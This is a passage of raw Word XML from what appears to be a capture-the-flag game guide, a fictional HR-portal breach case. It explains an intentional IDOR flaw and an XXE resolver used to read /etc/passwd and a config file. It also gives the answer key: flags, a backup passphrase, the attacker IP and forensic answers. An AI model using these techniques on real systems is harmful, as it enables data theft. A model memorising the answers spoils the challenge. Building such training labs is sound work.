        <w:t>Task:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit an insecure direct object reference in the payslip lookup to read another employee’s payroll record, and use XXE against the bulk-import feature to leak a backend config file containing a backup passphrase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>IDOR mechanic (verified from server.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Every player is assigned their own random payslip ID (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4413 + random(0,50)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, i.e. somewhere in 4413–4462). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/lab/payslip?id=N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> performs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no ownership check at all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> other than your own is looked up straight out of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitD.payslips</w:t>
      </w:r>
      <w:r>
        <w:t>. The interesting records sit at IDs 1003, 1005, 1007, and 1010, each with a name, role, tenure, and outstanding-debt field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reproduced the server’s hash check directly. Record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1007 (Inchaf, Payroll Clerk, Finance, 10 years)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> carries a debt of "$18,400 owed to Solstice Credit Union" — and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>debt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field’s stored hash matches the bare number </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"18400"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> exactly (the other three candidate strings, including the "$1,200" record, do not match). Inchaf is the same name that recurs later in the case as the employee who died.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>XXE mechanic (verified from server.js + lib/xxe.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The same real DOCTYPE/ENTITY resolver used in Stage 3 is sandboxed here to two files: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a decoy) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///etc/solstice/app.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> target for this stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># solstice-dynamics internal config (RESTRICTED)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># maintained by: vaaranan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>service: hr-portal-import</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>backup_passphrase: violet-harbor-42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>note: rotate this after every audit cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">tested </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"violet-harbor-42"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly against the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>passphrase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field’s stored hash: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exhibit D½ — a narrative beat, not a puzzle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A short story transition (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/ack-dhalf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) between Stage 4 and Stage 5. No technical task — confirmed directly from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>server.js</w:t>
      </w:r>
      <w:r>
        <w:t>’s handler, which does nothing but flip a flag and redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 5 — Exhibit E: "Reading the Logs"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Thahani hands over the HR portal’s full access and error logs covering the entire breach window — thousands of lines, most routine, a few decisive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> match the attack traffic to the four bugs from Stages 3–4, identify the attacker’s IP address, and find a flag hidden inside a custom User-Agent header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/access.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/error.log</w:t>
      </w:r>
      <w:r>
        <w:t>. Both were read directly for this document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">every attack request in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>access.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the SQLi login attempt, the UNION-based search injection, the flagged feedback POST (XSS), the bulk import (XXE), and five rapid-fire payslip lookups for five different IDs (IDOR probing) — comes from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>same IP: `203.0.113.66`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, confirmed against the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attackerIp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field’s stored hash. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>error.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> independently corroborates all four bug categories from the same IP, including the line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"five payslip lookups for five different ids in under a minute — possible IDOR probing."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">the very last line of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>access.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/logout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> request whose User-Agent string ends with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-GF/1.0 RP{GH0ST_LEFT_A_MARK_IN_THE_UA}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the flag is sitting there in plain text, exactly matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitE.uaFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 6 — Exhibit F: "Cached Evidence" (Disk Forensics)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A police contact recovers a laptop matching the attacker’s profile, registered to a name: **Arshb**. The laptop looks wiped, but a thumbnail cache and a Prefetch folder remember what the file system no longer does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recover an orphaned thumbnail for the final hidden flag, use Prefetch analysis to find the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> most frequently used program (not the first — that’s just Windows Explorer), and find that program’s exact last-run timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/thumbcache.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evidence/prefetch.txt</w:t>
      </w:r>
      <w:r>
        <w:t>. Both read directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>thumbcache.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> lists eleven normal cached thumbnails (screenshots, a resume, a vacation photo) plus one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>orphaned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry — no matching file left on disk — whose recovered EXIF comment is the flag itself: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RP{CACHE_NEVER_FORGETS_A_PHOTO}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitF.thumbFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> exactly. Its noted original filename, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IMG_20260801_...jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, is consistent with the case’s original café photo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ VERIFIED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefetch.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ranks executables by run count: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EXPLORER.EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (203 runs) is most frequent, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SQLMAP.EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (68 runs) is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> — exactly matching the task’s wording — with a last-run timestamp of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2026-09-19 23:47:12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">. Verified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"SQLMAP.EXE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> field’s stored hash (match), and the timestamp matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitF.lastRun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> exactly, character for character.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>thumbcache.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefetch.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also both reference a Windows user folder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>C:\Users\arshb\...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — consistent with the laptop being registered to "Arshb," named in this stage’s narrative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Epilogue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The case closes not with a courtroom verdict — that’s outside the player’s hands — but with a complete, evidenced timeline: a photo, an exploit, a log line, one step at a time. It documents exactly how Solstice Dynamics was breached, who did it, and where the attacker was on the night an employee "who trusted the wrong person" (Inchaf, the same name from the Stage 4 payslip) stopped being useful to him.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E9F8EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="198754"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Closing line: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Thahani closes the file: "Good work, Agent. This isn’t just a security case anymore. It’s a police case. Solstice Dynamics owes you one — and so might Inchaf’s family."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part II — Deep Dive: Stage 3 / Solstice PeopleHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The platform built and hardened during this session. Everything below was verified live against the running application, not written from memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Where Stage 3 sits in the case</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Login → Exhibit A → Stage 2 → Exhibit B → STAGE 3 / EXHIBIT C → Stage 4 → Stage 5 → Stage 6 → Epilogue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exhibit C’s completion requires two things, checked by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/exhibit-c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: (1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
